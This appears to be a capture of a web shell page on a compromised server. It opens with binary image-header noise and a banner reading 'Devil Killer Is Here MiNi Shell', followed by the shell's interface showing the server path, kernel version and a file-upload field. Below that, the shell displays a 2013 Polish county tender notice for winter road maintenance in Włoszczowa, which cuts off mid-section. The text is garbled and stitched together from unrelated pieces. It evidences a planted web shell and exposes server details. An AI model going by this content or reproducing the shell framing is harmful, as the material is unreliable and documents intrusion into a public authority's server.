JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131009/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131009/410544-N-2013.html

<p class="kh_header"><b>Włoszczowa: Zimowe utrzymanie dróg powiatowych na terenie Powiatu Włoszczowskiego 
w sezonie zimowym 2013/2014</b><br>
<b>Numer ogłoszenia: 410544 - 2013; data zamieszczenia: 09.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych we Włoszczowie , ul. Jędrzejowska 81, 29-100 Włoszczowa, woj. świętokrzyskie, tel. 041 3942519, faks 041 3942519.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zimowe utrzymanie dróg powiatowych na terenie Powiatu Włoszczowskiego 
w sezonie zimowym 2013/2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie zostało podzielone na dziewięć zadań częściowych:

Zadanie nr 1 -  Świadczenie usług przy zimowym utrzymaniu dróg 
                                      powiatowych  pługopiaskarką        
Zadanie nr 2 -   Świadczenie usług przy zimowym utrzymaniu dróg 
                                      powiatowych  pługopiaskarką 
Zadanie nr 3 -   Świadczenie usług przy zimowym utrzymaniu dróg 
                                      powiatowych  pługopiaskarką     
Zadanie nr 4 -   Świadczenie usług przy zimowym utrzymaniu dróg 
                                      powiatowych  pługopiaskarką     
Zadanie nr 5 -   Świadczenie usług przy zimowym utrzymaniu dróg 
                                       powiatowych  pługopiaskarką  oraz zapewnienie  placu 
                                      składowego na terenie gminy Radków lub Moskorzew 
                                      do składowania mieszanki piaskowo-solnej   wraz 
                                      z załadunkiem  na piaskarki     
Zadanie nr 6 -   Odśnieżanie dróg powiatowych  na terenie Powiatu 
                                    Włoszczowskiego  równiarką       

Zadanie nr 7 -   Odśnieżanie dróg powiatowych  na terenie Powiatu 
                                    Włoszczowskiego  równiarką

Zadanie nr 8 -   Odśnieżanie dróg powiatowych  na terenie Powiatu 
                                    Włoszczowskiego  ładowarką typu FADROMA      
Zadanie nr 9 - Świadczenie usług  przy zimowym utrzymaniu dróg powiatowych
                                 ładowarko - koparka

Świadczenie usług będzie się odbywało na zlecenie i według dyspozycji Zamawiającego.

Wykonawca po wezwaniu przez Zamawiającego podstawia sprzęt niezwłocznie, lecz nie później niż w ciągu 2 godziny.

Podstawiany sprzęt  musi być gotowy do natychmiastowego podjęcia akcji czynnej 
( sprawny technicznie, zatankowany ) Wszelkie koszty związane z powyższym ponosi Wykonawca.
Za opóźnienie w podstawieniu sprzętu Zamawiający będzie naliczał kary umowne w wysokości:
50 zł brutto za pierwszą godzinę opóźnienia w podstawieniu sprzętu  za każdą
jednostkę.
100 zł brutto za drugą i każdą następną godzinę opóźnienia  w podstawieniu  
sprzętu  za każdą jednostkę.
 
Wykonawca podstawiający sprzęt musi być przygotowany do pracy w sposób  
ciągły aż do odwołania.
Przyjmuje się naliczenie akcji czynnej od chwili wydania dyspozycji do chwili 
zakończenia akcji tj. wykonania powierzonego zadania.
W przypadku wystąpienia ustabilizowanych warunków pogodowych Zamawiający ma prawo zawiesić akcję zimowego utrzymania dróg - z możliwością jej przywrócenia 
w przypadku zmiany pogody, na tych samych warunkach finansowania.
UWAGA: W przypadku udzielenia zamówienia , Wykonawca będzie zobowiązany 
do wyrażenia zgody na wyposażenie nośników w urządzenia
do przekazywania  danych telemetrycznych ( zintegrowany moduł GPS/GPRS wraz z czujnikami) dotyczy zadania 1-5.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający  przewiduje udzielenie zamówień  uzupełniających,  o których  
         mowa  w art. 67  ust. 1   pkt. 6  Pzp.
         Dla poszczególnych zadań zamówienia zamawiający określił przewidywany zakres usług 
         gdyż uzależnione jest to od panujących warunków zimowych w sezonie zimowym 
         2013/2014. Wykonawcy będą świadczyć usługi w całym sezonie zimowym wg. 
         faktycznych potrzeb. Za ceny jednostkowe  netto określone w złożonych ofertach.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.63.00.00-2, 90.62.00.00-9, 93.90.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.04.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W przetargu nie jest wymagane wnoszenie wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od szczegółowego opisu warunku. 
Zamawiający dokona oceny spełnienia warunku na podstawie oświadczenia
o spełnianiu warunków w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagania:

           Zadanie 1 
                                    
           nośnik -      samochód  o ładowności  minimum 12 ton (min. dwie osie napędowe) 
                             na który zamontowana zostanie piaskarka i pług.
                              
          Zadanie 2 - 3 

           piaskarkę - pojemność załadunku minimum 4 m3           
           nośnik -      samochód  o ładowności  minimum 12 ton (min. dwie osie napędowe)  
          pług jednostronny lemieszowy -   sterowany hydraulicznie  z kabiny  kierowcy  
                                                       z dociskiem  oraz możliwością skrętu 

         Zadanie 4
          
          piaskarkę - pojemność załadunku ok. 4 m3           
          nośnik -      samochód  o ładowności  minimum 8 ton (min. dwie osie napędowe)  
          pług jednostronny lemieszowy -   sterowany hydraulicznie  z kabiny  kierowcy  
                                                       z dociskiem  oraz możliwością skrętu 

          
               Zadanie 5 
             
           piaskarkę - pojemność załadunku minimum 4 m3- 2 szt.          
           nośnik - samochód  o ładowności  minimum 8 ton (min. dwie osie napędowe)- 2 szt.
          pług jednostronny lemieszowy -   sterowany hydraulicznie  z kabiny  kierowcy  
                                                       z dociskiem  oraz możliwością skrętu - 2 szt. 
           plac składowy do składania mieszanki piaskowo- solnej
           koparko - ładowarka  1 - jednostka sprzętowa wraz z obsługą

               Zadanie 6            równiarka wyposażona w czołowy pług dwustronny -  
                                            1 jednostka sprzętowa 

              Zadanie 7            równiarka wyposażona w czołowy pług dwustronny -  
                                              1 jednostka sprzętowa

               Zadanie 8            ładowarka  - 1 jednostka sprzętowa  typu FADROMA
                                         o pojemności łyżki 3 m3
              Zadanie 9            ładowarko - koparka wraz z operatorem  - 1 szt.
                                           ( samojezdna o pojemności łyżki załadunku  powyżej 0,2 m3.)
Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że na  czas realizacji zamówienia będzie dysponował ww. sprzętem.                               
	Świadczenie usług będzie się odbywało na zlecenie i według dyspozycji Zamawiającego.
	Wykonawca po wezwaniu przez Zamawiającego podstawia sprzęt niezwłocznie, lecz nie później niż w ciągu 2 godziny.
	Podstawiany sprzęt  musi być gotowy do natychmiastowego podjęcia akcji czynnej 
( sprawny technicznie, zatankowany ) Wszelkie koszty związane z powyższym ponosi Wykonawca.

	Za opóźnienie w podstawieniu sprzętu Zamawiający będzie naliczał kary umowne w wysokości:
              50 zł brutto za pierwszą godzinę opóźnienia w podstawieniu sprzętu  za każdą
                                   jednostkę.
              100 zł brutto za drugą i każdą następną godzinę opóźnienia  w podstawieniu  
                                   sprzętu  za każdą jednostkę.
 
Wykonawca podstawiający sprzęt musi być przygotowany do pracy w sposób  
            ciągły aż do odwołania.
                  Przyjmuje się naliczenie akcji czynnej od chwili wydania dyspozycji do chwili 
                  zakończenia akcji tj. wykonania powierzonego zadania.

Wykonawca zapewni odpowiednią ilość pracowników  do obsługi pojazdów samochodowych i sprzętu (kierowcy, operatorzy) - zgodnie z kodeksem pracy.
UWAGA: W przypadku udzielenia zamówienia , Wykonawca będzie zobowiązany 
                             do wyrażenia zgody na wyposażenie nośników w urządzenia
                             do przekazywania  danych telemetrycznych ( zintegrowany moduł 
                             GPS/GPRS wraz z czujnikami) dotyczy zadania 1-5</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od szczegółowego opisu warunku. Zamawiający dokona oceny spełnienia warunku na podstawie oświadczenia o spełnianiu warunków w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku złożenia oferty przez Wykonawcę który  wykazując spełnienie  warunków, o których mowa  w art. 22 ust. 1 ustawy będzie polegać zasobach innych podmiotów na zasadach określonych  w art. 26 ust.2  b ustawy niezależnie od charakteru  prawnego łączących go z nim stosunków , w celu udowodnienia  zamawiającemu , iż będzie dysponował  zasobami niezbędnymi  do realizacji zamówienia w szczególności przedstawiając w tym celu pisemne zobowiązanie tych 
podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Wraz z ofertą należy złożyć  pisemne zobowiązanie tych podmiotów.  Pełnomocnictwa  Zamawiający zaleca, aby Wykonawca do oferty załączył dokument lub dokumenty z których będzie wynikać  uprawnienie do podpisania ofert - pełnomocnictwo osób podpisujących  ofertę do podejmowania zobowiązanie  w imieniu firmy  składającej ofertę o ile osoba reprezentująca wykonawce  w postępowaniu o udzielenie zamówienia  nie jest wskazana jako upoważniona  do jej reprezentacji we właściwym rejestrze.Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa: 1  pkt. 9.2.1    -   składa dokument lub dokumenty wystawione w kraju, w którym ma  siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
         a) nie otwarto jego likwidacji ani nie ogłoszono upadłości
         b) nie orzeczono wobec niego zakazu ubiegania się o zamówienie
  wystawione nie wcześniej niż 6 miesięcy przed upływem terminu do składania ofert.
Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się  dokumentów ,o którym mowa w pkt. 9.3 zastępuje się je dokumentem zawierającym oświadczenie , w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sadowym, administracyjnym lub organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania  osoby lub kraju w którym wykonawca ma siedzibę lub miejsce zamieszkania lub przed notariuszem wystawione w terminie odpowiednio z zapisami pkt. 9.3
Kserokopie dokumentu rejestracyjnego - poświadczoną przez wykonawcę 
 za zgodność z oryginałem  w oparciu o którą zamawiający będzie mógł określić 
spełnienie wymagań w zakresie wymaganej ładowności bądź masy całkowitej a także 
aktualności badania technicznego.
Wykonawcy których oferty zostaną wybrane jako najkorzystniejsze  - przedłożą zamawiającemu w dniu zawarcia umowy o0płacona polisę  lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Umowę można zmienić, jeżeli wystąpią istotne okoliczności, których nie można 
                   było przewidzieć w chwili zawarcia umowy, w szczególności:
                 -  zmiana cen brutto w przypadku urzędowej zmiany stawki podatku  VAT);</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.starostwo.wloszczowa.eobip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych 29-100 Włoszczowa ul. Jędrzejowska 81 pok 7.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.10.2013 godzina 10:00, miejsce: Zarząd Dróg Powiatowych 29-100 Włoszczowa ul. Jędrzejowska 81 pok 7.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Świadczenie usług przy zimowym utrzymaniu dróg 
                                      powiatowych  pługopiaskarką.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zapotrzebowanie:
1	pługopiaskarka  -  1 jednostka sprzętowa

2. Do realizacji zamówienia Wykonawca zapewni:

a.	  nośnik - samochód o ładowności  minimum 12 ton  (min. dwie osie napędowe) - 
                   na który zostanie zamontowana piaskarka i pług.

Do realizacji zamówienia Zamawiający przekaże Wykonawcy nieodpłatnie piaskarkę  P1-J - 1 jednostka sprzętowa, 1 pług lemieszowy jednostronny.

 3.    Przewidywane ilości  usług  w sezonie 2013/2014

a.	pługopiaskarka   
- akcja czynna -   10.000,00   km
- akcja bierna  -        250  godz.

Podane powyżej ilości usług  są tylko ilościami  przewidywanym, zależą od warunków  atmosferycznych  i mogą  ulec zmianie. 
      
4.  Świadczenie usług przy zimowym utrzymaniu dróg

   a. akcja czynna - polegająca na usuwaniu śniegu oraz zwalczaniu śliskości 
                                materiałami    uszorstniającymi  na drogach powiatowych.
  
           Przyjmuje się naliczenie akcji czynnej od chwili wydania dyspozycji do chwili 
           zakończenia akcji    tj. wykonania powierzonego zadania.

         b.  akcja bierna  - polegająca na dyżurze operatora  sprzętu   w stanie  gotowości do 
                                       ewentualnego  prowadzenia akcji  czynnej.

5. Rozliczenie usług

    a. rozliczenie usług będzie się odbywało według cen jednostkowych  brutto  w akcji czynnej 
        i biernej.

    b.  wartość  godziny  biernej  (w akcji biernej).

    Zamawiający ustala na kwotę  10,00  zł  brutto. słownie złotych; dziesięć złotych 00/100

    c. należność (wynagrodzenie)   jest sumą  iloczynów  cen jednostkowych i wykonanych usług 
       (potwierdzonych przez zamawiającego w raportach pracy)   w akcji czynnej i biernej.
      Rozliczenie  usługi za prowadzenie akcji czynnej  nastąpi  na podstawie rejestratora 
      aparatury kontrolno-pomiarowej GPS za faktycznie odśnieżone odcinki dróg.

    Przekazanie piaskarki i pługa nastąpi protokółem przekazania sprzętu
 po podpisaniu umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2, 93.90.00.07-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Świadczenie usług przy zimowym utrzymaniu dróg 
                                      powiatowych  pługopiaskarką.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zapotrzebowanie:
1   pługopiaskarka  -  1 jednostka sprzętowa

2. Do realizacji zamówienia Wykonawca zapewni:

a. piaskarkę - pojemność załadunku minimum. 4 m3
b. nośnik - samochód  o ładowności  minimum 12 ton  (min. dwie osie napędowe)  
c. pług jednostronny lemieszowy - sterowany hydraulicznie z kabiny kierowcy z dociskiem oraz możliwością skrętu - 1 szt.            

 3.    Przewidywane ilości  usług  w sezonie 2013/2014

a. pługopiaskarka   
- akcja czynna -   10.000,00   km
- akcja bierna  -        250  godz.
           

Podane powyżej ilości usług  są tylko ilościami  przewidywanym, zależą od warunków  atmosferycznych  i mogą  ulec zmianie. 
      
4.  Świadczenie usług przy zimowym utrzymaniu dróg

   a. akcja czynna - polegająca na usuwaniu śniegu oraz zwalczaniu śliskości 
                                materiałami    uszorstniającymi  na drogach powiatowych.
  
           Przyjmuje się naliczenie akcji czynnej od chwili wydania dyspozycji do chwili 
           zakończenia akcji    tj. wykonania powierzonego zadania.

         b.  akcja bierna  - polegająca na dyżurze operatora  sprzętu   w stanie  gotowości do 
                                       ewentualnego  prowadzenia akcji  czynnej.

5. Rozliczenie usług

    a. rozliczenie usług będzie się odbywało według cen jednostkowych  brutto  w akcji czynnej 
        i biernej.

b.	wartość  godziny  biernej  (w akcji biernej).

    Zamawiający ustala na kwotę  10,00 zł  brutto. słownie złotych; dziesięć złotych 00/100

    c. należność (wynagrodzenie)   jest sumą  iloczynów  cen jednostkowych i wykonanych usług 
       (potwierdzonych przez zamawiającego w raportach pracy)   w akcji czynnej i biernej.
      Rozliczenie  usługi za prowadzenie akcji czynnej  nastąpi  na podstawie rejestratora 
      aparatury kontrolno-pomiarowej GPS za faktycznie odśnieżone odcinki dróg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.63.00.00-2, 90.62.00.00-9, 93.90.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Świadczenie usług przy zimowym utrzymaniu dróg 
                                      powiatowych  pługopiaskarką.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zapotrzebowanie:
1	pługopiaskarki  -  1 jednostka sprzętowa

2. Do realizacji zamówienia Wykonawca zapewni:

a. piaskarkę - pojemność załadunku minimum 4 m3
b. nośnik - samochód  o ładowności  minimum 12 ton  (min. dwie osie napędowe)  
c. pług jednostronny lemieszowy - sterowany hydraulicznie z kabiny kierowcy z dociskiem oraz możliwością skrętu - 1 szt.

 3.    Przewidywane ilości  usług  w sezonie 2013/2014

a.  pługopiaskarka   
- akcja czynna -   10.000,00   km
- akcja bierna  -        250  godz.

Podane powyżej ilości usług  są tylko ilościami  przewidywanym, zależą od warunków  atmosferycznych  i mogą  ulec zmianie. 
      
4.  Świadczenie usług przy zimowym utrzymaniu dróg

   a. akcja czynna - polegająca na usuwaniu śniegu oraz zwalczaniu śliskości 
                                materiałami    uszorstniającymi  na drogach powiatowych.
  
